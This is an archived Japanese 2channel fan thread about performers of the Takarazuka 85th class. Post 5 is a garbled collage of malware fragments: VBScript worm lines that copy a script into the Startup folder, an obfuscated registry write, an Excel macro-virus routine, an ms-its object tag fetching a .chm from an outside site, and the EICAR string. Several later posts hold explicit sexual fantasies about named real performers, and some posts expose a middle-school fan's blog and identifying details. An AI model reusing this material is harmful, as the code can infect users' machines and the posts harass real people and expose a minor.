2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【エイティ】。85期スレ〜part4〜。【ファイブ】

1 :名無しさん@花束いっぱい。:2006/12/21(木) 00:23:30 ID:FGHVGaUY
85期生についてマターリと語るスレです。
・煽り
・荒らし
・過度の粘着アンチ
についてはスルーでお願いします。
スルーできなかったあなたも同類です。
sage進行だったら嬉しいかも。
次スレは>>970を踏んだ人が立てて下さい。
立てれない場合は必ず代理を頼む事。

前スレ
【研8】。。85期スレ〜part3〜。。【新公卒業】
http://hobby8.2ch.net/test/read.cgi/siki/1147572193/

ではマターリどぞ。

2 :ガチ:2006/12/21(木) 00:53:18 ID:VQLsD7pA
2ゲット

3 :名無しさん@花束いっぱい。:2006/12/21(木) 08:10:25 ID:hKOvueL+
FGHVGaUYタソ 乙!

グラフ新年号「握り場!エネル源!!」の月組85期。
男役のもりえより力強いみっぽーときいちゃん(右のみ)にビクーリ。



4 :名無しさん@花束いっぱい。:2006/12/21(木) 21:53:20 ID:MTvHKIn7
>>1
乙華麗!

5 :<body onload=window()>:2006/12/21(木) 23:06:09 ID:TLNwIaJu
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

6 :名無しさん@花束いっぱい。:2006/12/21(木) 23:09:17 ID:xG7n0rOR
まさことかも見てる?このスレ。

7 :名無しさん@花束いっぱい。:2006/12/21(木) 23:26:50 ID:dZ6/d4WV
>>6
sage進行推奨ヨロ(´;ω;`)

まさこは知らんが確実に彩○・○形とそのスタッフは見てるww

8 :名無しさん@花束いっぱい。:2006/12/21(木) 23:31:07 ID:xG7n0rOR
俺まさこチュキなんだよね。まさこも2見てたらワロス。ぶっといメガネかけてさ。誰かまさこに2見るように言ってくれよ。七はみてるよね。

9 :名無しさん@花束いっぱい。:2006/12/22(金) 08:48:51 ID:gLVOlYoN
>>7え〜
じゃあ基地害の妄想みつるに見られたの?

10 :名無しさん@花束いっぱい。:2006/12/22(金) 11:28:46 ID:kKJEo8yz
>6>8は宙スレで有名な糞ですよ。

華麗にスルーよろ

11 :名無しさん@花束いっぱい。:2006/12/22(金) 12:46:27 ID:d+tUfAvo
みなみ会ウザイ!
消えて欲しい。

12 :名無しさん@花束いっぱい。:2006/12/22(金) 17:09:38 ID:/6wkQKjP
消えてほしいのは代表?スタッフ?会員?

13 :名無しさん@花束いっぱい。:2006/12/22(金) 18:10:37 ID:izcoTKkA
みなみは随分前もドキュソなファンくっついてたよね
人がよいのか

14 :名無しさん@花束いっぱい。:2006/12/22(金) 20:49:22 ID:fEe9tp5t
みなみは見た目からしてよくも悪くも人がよさそう。
そんなみなみが大好きですが。

15 :名無しさん@花束いっぱい。:2006/12/22(金) 22:18:22 ID:aTxyjV7q
ファンって小柄な女の子がいつもいるよね。
他を見かけたことないんだけど。

16 :名無しさん@花束いっぱい。:2006/12/22(金) 23:15:26 ID:aW4XBUWu
みつる会の変なおばさんはどうなった?
みつる、みなみ、めお、…?
85期はおかしなファンが多いよね。




私もか('A`)

17 :名無しさん@花束いっぱい。:2006/12/23(土) 00:41:12 ID:V0JTFOSj
同じくウザイ

肉代表消えてほしい!

18 :名無しさん@花束いっぱい。:2006/12/23(土) 19:18:27 ID:Ru4Tsyzz
ミツルたんたら!見てるの??ミツルたんエッチぃ

19 :名無しさん@花束いっぱい。:2006/12/23(土) 20:14:28 ID:Ru4Tsyzz
ミツルたんは(σ*´∀`)のロミオ
(σ*´∀`)はミツルのジュリエット

20 :名無しさん@花束いっぱい。:2006/12/23(土) 20:19:52 ID:Ru4Tsyzz
ミツルたんとエッチちたいお(ハァト
ミツルたんは童貞だから一生懸命エッチするお?
オパーイモミモミ大好きなんねミツルたん

21 :名無しさん@花束いっぱい。:2006/12/23(土) 20:22:10 ID:Ru4Tsyzz
ミツルたんとメオたんて仲悪いの?もしかして(σ*´∀`)の取り合いだっちゃ?

22 :名無しさん@花束いっぱい。:2006/12/23(土) 22:37:11 ID:/h9yJoi0
あの人そんな裏あったのか

23 :名無しさん@花束いっぱい。:2006/12/23(土) 23:21:57 ID:pF3u/rSf
ふありちゃんから退団の挨拶状が来ました。
すごく綺麗
お幸せに…(´;ω;`)

24 :名無しさん@花束いっぱい。:2006/12/24(日) 01:09:47 ID:oelyhwUz
23日のひろみ会、ガードにあいかわらず孫付きのオバチャンが居た。
一番前がアレでいいのか?
ひろみ会が愚図で早く動けないのってあの幼児のせい?って思っちゃう。


25 :名無しさん@花束いっぱい。:2006/12/24(日) 12:43:06 ID:TP84c9H5
ミツルたんメリークリスマスだお(*'I`艸)☆*:゜

26 :名無しさん@花束いっぱい。:2006/12/24(日) 12:56:14 ID:3Na2NM/B
ひろみちゃん、楽だね!!マルセル最後まで頑張って〜♪

27 :名無しさん@花束いっぱい。:2006/12/24(日) 22:00:11 ID:T2djPRZQ
24番さんや、ひろみファンなんじゃないの?幼児にひがむなよ。


28 :名無しさん@花束いっぱい。:2006/12/24(日) 22:34:48 ID:TP84c9H5
ミツルたんもしやユミコと過ごしてるんじゃなかろうな?

29 :名無しさん@花束いっぱい。:2006/12/24(日) 23:53:52 ID:HRBhsZI4
み○み会・み○る会・ひ○み会
どこもコドモばっかりだねw
一番コドモが多いのはみ○る会?
み○み会は実年齢不明の若者。
ひ○み会は会員の子供。
み○る会はガードも入り出も子供ばかりじゃないかw
いつかの並びの時は学生とおばさんしかいなかったよw<み○る会
ひ○み会はウロチョロしすぎ。
み○み会は態度でかすぎ。
み○る会は保育所。
85期は大変だねw

30 :名無しさん@花束いっぱい。:2006/12/25(月) 01:04:35 ID:2CPlUYjs
わざわざ○抜きすんなや
嘘くさーわざとらしー

31 :名無しさん@花束いっぱい。:2006/12/25(月) 21:19:05 ID:+apRmBPV
ミツルの金玉もみたい

32 :名無しさん@花束いっぱい。:2006/12/25(月) 21:29:20 ID:+apRmBPV
ミツルたん聖なる夜にエチーしよ

33 :名無しさん@花束いっぱい。:2006/12/25(月) 21:54:16 ID:KsqyJR0P
>>31
ねぇーよw


みつる会ってそんなに子供いる?
4、5人しか見たことないけど。
年輩者が多いから目立つだけでしょ。
どこの会でも子供だって同じ一会員。
痛い行動でもしない限りは晒すのはやめようよ。

34 :名無しさん@花束いっぱい。:2006/12/27(水) 18:05:28 ID:KiqGYG4H
ねぇミーたん…ユミコのPB見てたらミーたん見付けちゃったよ…
何でミーたんユミコの隣なの?そんなにミーたんユミコが好きなの?ミーたんユミコと組別れてお別れしたんでしょ?
ミーたんσ(´・д・`)やだから…ユミコにミーたん取られるのやだから…

35 :名無しさん@花束いっぱい。:2006/12/27(水) 20:30:45 ID:wMSvzY6k
スレチだけど
PBみてたらミツルとゆみこって似てる。
服とか。眉の描き方とか。


36 :名無しさん@花束いっぱい。:2006/12/27(水) 21:14:34 ID:KiqGYG4H
ミーたんを誘惑したユミコ許せないお(´⊇`)

37 :名無しさん@花束いっぱい。:2006/12/27(水) 23:15:10 ID:KiqGYG4H
ミーたんごめんね(;o;_;)o今σ(´・д・`)ケチャマンだからエチーできないや…

38 :名無しさん@花束いっぱい。:2006/12/27(水) 23:26:25 ID:TkT5ROoZ
多重人格粘着真性麻子ファン=真性基地害=ID:KiqGYG4H

39 :名無しさん@花束いっぱい。:2006/12/27(水) 23:29:56 ID:KiqGYG4H
ミーたんニュージェネ見て大門が気に入ったから今度紹介してお(*'I`艸)☆*:゜あ、嫉妬しちゃめぇだからね!
(σ*´∀`)の旦那たまはミーたんだけなんだからぁ

40 :名無しさん@花束いっぱい。:2006/12/27(水) 23:36:19 ID:KiqGYG4H
ミーたんは合コンしちゃ駄目だからね!ミーたんが合コンしたら殴り込みに行くからヾ(`へ´*)ノ
ミーたんとめおたんは絶対めぇだからね!きよみも一応めぇよ!

41 :名無しさん@花束いっぱい。:2006/12/27(水) 23:40:32 ID:KiqGYG4H
ミーたん、最近ね龍が如く2ってゆうゲームやってるんだけど、その中にマリエッタってゆうキャバクラが出てくるんだよ!マリエッタと言えばCOSMOS troupeの組長たんだおねん(´⊇`)
ミーたんが来てくれるならキャバ嬢でもなんでもやるおん(はぁと

42 :名無しさん@花束いっぱい。:2006/12/27(水) 23:46:48 ID:KiqGYG4H
ミーたん今何してるの?まさかユミコと密会?もしそうだったら許さないからね!

43 :名無しさん@花束いっぱい。:2006/12/27(水) 23:58:43 ID:zUWEH1gu
sage進行推奨ヨロ。
基地害だろうと約束は守ろうね。
ミーたんは今頃寝てるよ。

44 :名無しさん@花束いっぱい。:2006/12/28(木) 01:05:39 ID:0MTeD8nF
ひろみぃ〜!!

45 :名無しさん@花束いっぱい。:2006/12/28(木) 09:53:59 ID:4tcLrZj1
ひろみちゃん今日は中日集合日だね。がんばれ〜!

46 :名無しさん@花束いっぱい。:2006/12/29(金) 21:56:18 ID:1pTpPrEd
ミツルファン超痛しww↓ 中3でムラの並びしてる会員って限定されるんじゃない?w
本当に痛いお子さま多いんだね。前も別の子?晒されてなかった!?
堂々と同じ組の下級生とかけもちなんて痛すぎる! お礼状まで載せられてテラカワイソス。。

http://yaplog.jp/manamihikaru/archive/

47 :名無しさん@花束いっぱい。:2006/12/29(金) 22:36:57 ID:ob4xNeDh
>46
カワイソスなのはもまいの頭だな

48 :名無しさん@花束いっぱい。:2006/12/29(金) 22:55:04 ID:1pTpPrEd
本人登場w 2ちゃん見てる事も書いてる内容もブログに書いてたねw
ミツル会の代表スタッフさん、中3の子って特定できるんじゃない?
こういうのばっか蔓延らせてるの?w

49 :名無しさん@花束いっぱい。:2006/12/29(金) 23:24:12 ID:aA+HnQoU
>>46
22時半に見たときには、もう削除されてたw
どんな内容だったの?
アドレスがまなみひかるってことはHNがマナミだったんだ?

50 :名無しさん@花束いっぱい。:2006/12/29(金) 23:44:00 ID:AbCRTk82
なんだかミツルがかわいそう。ファンを選べないからね。

51 :名無しさん@花束いっぱい。:2006/12/29(金) 23:49:35 ID:aA+HnQoU
みつるファン、オンで痛いだけじゃなくて、オフでも痛いの?

52 :名無しさん@花束いっぱい。:2006/12/29(金) 23:58:04 ID:1pTpPrEd
>>49 ライ○ドアでブログ検索したら、ミツル以外の事はちょっと残ってるよ。

>>29の記述を載せ、「お子様」「保育園」って言うのを怒っていたw(2や8常連とありw)
・現在中3、関西弁だし「並び」とあるからムラ会員らしい。
・月の並びに参加して写真をもらったらしいw
・かけもちは花研3男役、年賀状の画像までうpしてた。
・しゅん様(祐澄)の事も好きらしいw

なんでこんな痛いファンばっかり沸いてくるの?>ミツル会ってww
代表さん、ちょっとマジで考えて指導したら?

53 :名無しさん@花束いっぱい。:2006/12/30(土) 00:07:08 ID:wv+T8yJ/
どこでもかしこでも痛いミツルふぁん。

54 :名無しさん@花束いっぱい。:2006/12/30(土) 01:22:18 ID:Q29KIjL8
>>46>>52
イタイのはあなた達の頭だよ。
確実に特定できる方向へ持って行って何してるの?
確かに掛け持ちもお礼状うpもいけない事かもしれない。
だけど、そのまま晒すのは良くないんじゃない?
まず相手に警告したりもできたはずでしょ。
それにここ見てたけど、みつる会の子供が何したとまでは書いてなかったはずだけど?
ただ子供が多い。
それしか書いてなかった気がしたけど。
それでブログ特定できるものかな。

55 :名無しさん@花束いっぱい。:2006/12/30(土) 01:51:57 ID:M3BvkG2f
暇だからみつるファンブログ探索してきた。

独断と偏見によるみつるファンブログ調べ(年齢別)
・社会人2人
・大学生1人
・高三1人
・中三3人
・中一1人
・年齢不詳1人
以上。
中3多くてわかんねw
関西2人の関東1人。
うち2つは最近更新してない。
華形ひかるだけで随分ひっかかった。
これ面白いよ。

56 :名無しさん@花束いっぱい。:2006/12/30(土) 02:31:50 ID:t3a/y86d
>>47=>>54?w 痛くて焦ってるのはオマイの方だってば・・・orz
>それにここ見てたけど、みつる会の子供が何したとまでは書いてなかったはずだけど?

そういう事言ってるんじゃなくて、たまたま見つけたから貼っただけじゃないの??

てか本当、前からみつるファンってネット・ブログ率高いよねw
前にもブログに画像うpしてた子いたよね。同一人物なのかな?(違ったら違ったで痛いけどw)
なんで前にも晒されて叩かれたのに反省しないんだろう・・・
いつも逆切れとか本当に子供っぽいし。


57 :名無しさん@花束いっぱい。:2006/12/30(土) 02:38:30 ID:t3a/y86d
付け足し。
それにやたら掛けもちしてるファン多いのも特徴w
みつるファンってミーハー多いんだろうね。本当代表さん何とも出来ないの?

58 :名無しさん@花束いっぱい。:2006/12/30(土) 09:22:31 ID:u2a13P1r
ぴ○り(×)
マ○ミ

海○(×)
千○(×)
珠○(×)
奈○
春○


実際は知らないけど×印が掛け持ちなし。
○と奈○が画像晒しだとオモワレ。
奈○は自演アイドルちゃんw
これだけ書いたから、もういい?
みつるファン叩きはよそでやってね。

59 :名無しさん@花束いっぱい。:2006/12/30(土) 09:54:05 ID:Q29KIjL8
>>56
>>47でもないし焦ってもないよ。
みつるは贔屓じゃないから私には関係ない。
だけど端から見てるとイタイ行動をしてるのはブログ管理者もあなたも一緒。
突然物凄いテンションでブログを晒しにきて
ブログ管理者の事を記号多用で事細かに書いていく。
それに私が特定できる?
と書いたのは保育所としか書かれていないのに
よく「中3のこのブログじゃないの!?」と見つけた点。
もしかしたら保育所とあるんだから幼稚園・小学生ぐらいの子供かもしれない。
並びで見たと言うなら必ずしも会員とは特定できないはず。
例えもし晒すとしてもテンションを抑えて行動できたはずでしょ。
そのテンションの高さがイタイと言ってるの。
そんな勢いで書いていると逆に私怨?とさえも思えるよ。
私もこうして反論してる時点でイタイのかもしれないけどね。

60 :名無しさん@花束いっぱい。:2006/12/30(土) 13:29:43 ID:DAmq6SeD
みつるもここ見てるならどうにかしてよw

61 :名無しさん@花束いっぱい。:2006/12/30(土) 14:18:46 ID:M3BvkG2f
スマソ。
私のせいでややこしくしちゃったみたいだね。
みつる会怨まれてるの?
私の知ってる西会員さんはにこにこしてていい人多いけど…(老若問わず)
そろそろみつるに迷惑かかるからやめない?


62 :名無しさん@花束いっぱい。:2006/12/30(土) 18:39:21 ID:Q2PMuI72
つか他板でこういう晒しやったら
まずやった方が袋にされる罠

63 :名無しさん@花束いっぱい。:2006/12/30(土) 23:15:41 ID:t3a/y86d
ID:Q2PMuI72 やっぱりお子さまのミツルファソ。
花スレで下級生にケチつけてて笑えるw そんなに余裕ないんだね、ファンも生徒もww

ブログ晒されて当然、ここでは痛いブログの方が叩かれて当然なんだよ。
前も痛いブログ叩かれてるんだから、ちょっとは反省って言葉覚えなよ。


64 :名無しさん@花束いっぱい。:2006/12/31(日) 01:30:31 ID:mvDiC6Ht
>>62
そんなことはない。

痛ければ祭りになる。
ほのかに痛ければ飽きるまで叩かれて、沈下した後もニラニラヲチられる。
痛くなければ「私怨乙」。

65 :名無しさん@花束いっぱい。:2006/12/31(日) 11:12:20 ID:d79jIvex
全員バカじゃん

66 :名無しさん@花束いっぱい。:2006/12/31(日) 11:18:29 ID:CK4DOBAj
みつるの話は飽きた。
そうでなくても85はレオン以外は薄いんだから、一致団結して85たちを応援してやろうや。


67 :名無しさん@花束いっぱい。:2006/12/31(日) 12:49:59 ID:mz04ZL/r
85ではひろみが一番好き

68 :名無しさん@花束いっぱい。:2006/12/31(日) 22:40:21 ID:3XORq6SE
あの・・・アレだアレ。
マ○ミも晒し厨も会も悪いって事でこの話はおしまいっと。

折角の年末。
今年の85期を思い出していこうよ。

69 :名無しさん@花束いっぱい。:2006/12/31(日) 23:44:40 ID:cY09ChWe
2007年は華形ひかるが光ります

70 :名無しさん@花束いっぱい。:2007/01/01(月) 00:40:47 ID:3Qn2jw1y
あけましておめでとう

71 : 【小吉】 【702円】 :2007/01/01(月) 00:59:22 ID:P1Cmu3G+
今年もみなみ頑張って!!

72 :名無しさん@花束いっぱい。:2007/01/01(月) 01:37:13 ID:4KmZPkCz
>>69
誰が上手いこ…(ry
2007年は華形ひかるのデコが更に輝きます

73 : 【小吉】 【281円】 :2007/01/01(月) 02:54:43 ID:3MOjwOT6
>72
2007年も嶺輝あやとのでこも輝きます


74 :名無しさん@花束いっぱい。:2007/01/01(月) 20:18:05 ID:IgY6U5p6
明けましておめでとうございます。
今年もひろみちゃんお応援するぞ!
中日楽しみ!エリザはちょっと怖いけど、でもやっぱ楽しみだ!

75 :名無しさん@花束いっぱい。:2007/01/02(火) 20:38:28 ID:vIFS2EHP
ミータン明けましておめでとうだよ
ミータン愛してる

76 :名無しさん@花束いっぱい。:2007/01/02(火) 20:43:35 ID:QlwphyOh
音きちエトワールオメ!!

77 :名無しさん@花束いっぱい。:2007/01/02(火) 23:21:54 ID:Hf3aIRm3
>>72-73
ペタワロスww
だから誰がうま(ry
花85男はでこしか光るも(ry


新年早々笑わせてもらいました。

78 :名無しさん@花束いっぱい。:2007/01/02(火) 23:23:31 ID:vIFS2EHP
ミータンの勃起ちたオチンコ舐めたいお
そんでバキュームフェラちてミータンのCALPIS一杯だしてん

79 :名無しさん@花束いっぱい。:2007/01/05(金) 08:29:33 ID:6O3vlcuX
ミータンたら朝御飯いっぱい食べ過ぎだよ?動けなくなったらどうするの?もんっミータンたら

80 :名無しさん@花束いっぱい。:2007/01/05(金) 19:14:11 ID:6O3vlcuX
キヨタンお休みだお…キヨタン腕枕してお…

81 :名無しさん@花束いっぱい。:2007/01/05(金) 19:18:21 ID:6O3vlcuX
キヨタンの優しそうな笑顔にキュンとしたお…キヨタン抱いてせにょりた

82 :名無しさん@花束いっぱい。:2007/01/05(金) 19:45:21 ID:obcpFhwG
正月早々いったいどうしちゃったんだ〜

83 :名無しさん@花束いっぱい。:2007/01/05(金) 20:51:58 ID:A510+IbB

多重人格粘着真性麻子ファン=精神異常者=ID:6O3vlcuX
基地外にはくれぐれもレスしないよーに。

84 :名無しさん@花束いっぱい。:2007/01/05(金) 20:52:35 ID:6O3vlcuX
キヨタンのこと考えてたらマンマン濡れちゃったよ…どうしてくれんのキヨタン?

85 :名無しさん@花束いっぱい。:2007/01/05(金) 20:59:24 ID:6O3vlcuX
キヨタンに左乳首舐められミータンには右乳首でメオタンにはマンマンだお


86 :名無しさん@花束いっぱい。:2007/01/05(金) 21:03:10 ID:6O3vlcuX
ミータンにはユミコと別れるまでマンマンなめさせないからね!

87 :名無しさん@花束いっぱい。:2007/01/05(金) 21:06:56 ID:6O3vlcuX
ミータンにはお仕置きが必要なりね
キヨタンとメオタンはお仕置きいらないよ
メオタンはあーちゃんに手を出したり許せないこともあったけど今はもういいんだからぁ
ミータンは駄目なりよ

88 :名無しさん@花束いっぱい。:2007/01/05(金) 21:10:15 ID:6O3vlcuX
メオタンにパイズリしてあげたいな…メオタンの顔に(σ*´∀`)のデカイパイパイ挟んでアゲル

89 :名無しさん@花束いっぱい。:2007/01/05(金) 21:13:37 ID:6O3vlcuX
ミータンは我慢だからね!ミータンはお仕置きだから!ユミコと密会したんだから当然だもん!

90 :名無しさん@花束いっぱい。:2007/01/05(金) 22:01:14 ID:qhu6/igI
>76タソ
ホントー????嬉しいぞ(;_;)
おときち、ヒロミちゃん、そして85期のみんな!2007年もガンガレ〜応援するぞ☆

91 :名無しさん@花束いっぱい。:2007/01/06(土) 01:54:39 ID:a/kxSbXd
オトキチって誰ですか?85期?

92 :名無しさん@花束いっぱい。:2007/01/06(土) 08:50:16 ID:mDXED05j
オトキチ=音姫すなおちゃん
エトワールはゆりの&れみの3人セットだけど、おときっちゃんが真ん中なんだぉ
本公演初エトワールおめ!

93 :名無しさん@花束いっぱい。:2007/01/07(日) 13:45:16 ID:w8styEVx
ミータンってださ

94 :名無しさん@花束いっぱい。:2007/01/07(日) 17:28:14 ID:818ey8Nv
ダサくないもん(`H´◎)

95 :名無しさん@花束いっぱい。:2007/01/07(日) 22:13:48 ID:hZIsy0h1
お稽古入り時間って深夜にならなきゃわかんないものなの?
明日の入り時間のメール配信が深夜2時や3時…orz
だからメールの件名も「今日の入り」www

96 :名無しさん@花束いっぱい。:2007/01/08(月) 18:35:18 ID:Pq1axzNU
れおんくんは、もう星二番手と認定してよい?
やぶちゃんが言ってるけど。

97 :名無しさん@花束いっぱい。:2007/01/08(月) 19:01:35 ID:zCI6JmS1
>>96
いいでそ。

>>95
遅いところは朝のところもあるよ。
生徒が入り時間決める頃に代表が寝ているから朝になるんだろうけど。

98 :名無しさん@花束いっぱい。:2007/01/08(月) 19:17:25 ID:Pq1axzNU
やったー!若い二番手!
うれしいです。
大変だろうけど、がんばって欲しいです。

99 :名無しさん@花束いっぱい。:2007/01/09(火) 12:55:19 ID:wFkHUxq8
ひろみ、地道にガンガレ!!

100 :名無しさん@花束いっぱい。:2007/01/09(火) 13:22:22 ID:IocMdxdL
お稽古の入り時間の連絡が遅いのは、
生徒からの連絡が遅いのだと思いますよ。
ウチの生徒はそうでした・・。
代表が、遠方から来る人のためにできるだけ早く教えてと
言ったら少しマシになったけど。
生徒は、ファンの事より、
自分のやる事の方を優先しちゃうのでしょう。
代表や、ファンの対して思いやりの持てる人、
ファンに少しでも来てほしいと思ってる人なら
早めに連絡すると思う。

101 :名無しさん@花束いっぱい。:2007/01/09(火) 15:10:06 ID:VTpB94PC
ミータンとお付き合いして1年と11ヶ月経ちましたね
もうすぐ2年だよ(ハァト
今度ミータンにお手製デカ弁当届けるからね待っててね(*´∀`*)

102 :名無しさん@花束いっぱい。:2007/01/09(火) 15:22:53 ID:wkN9n/Io

VTpB94PC = 多重人格粘着真性麻子ファン、いい加減にしろよw


103 :名無しさん@花束いっぱい。:2007/01/09(火) 15:34:08 ID:VTpB94PC
ミータンたら本当に可愛いんだから(ハァトご飯一杯食べてる時の顔大好きなんだよ☆
久しぶりにミータンに抱っこされたいなぁ(*'I`艸)

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)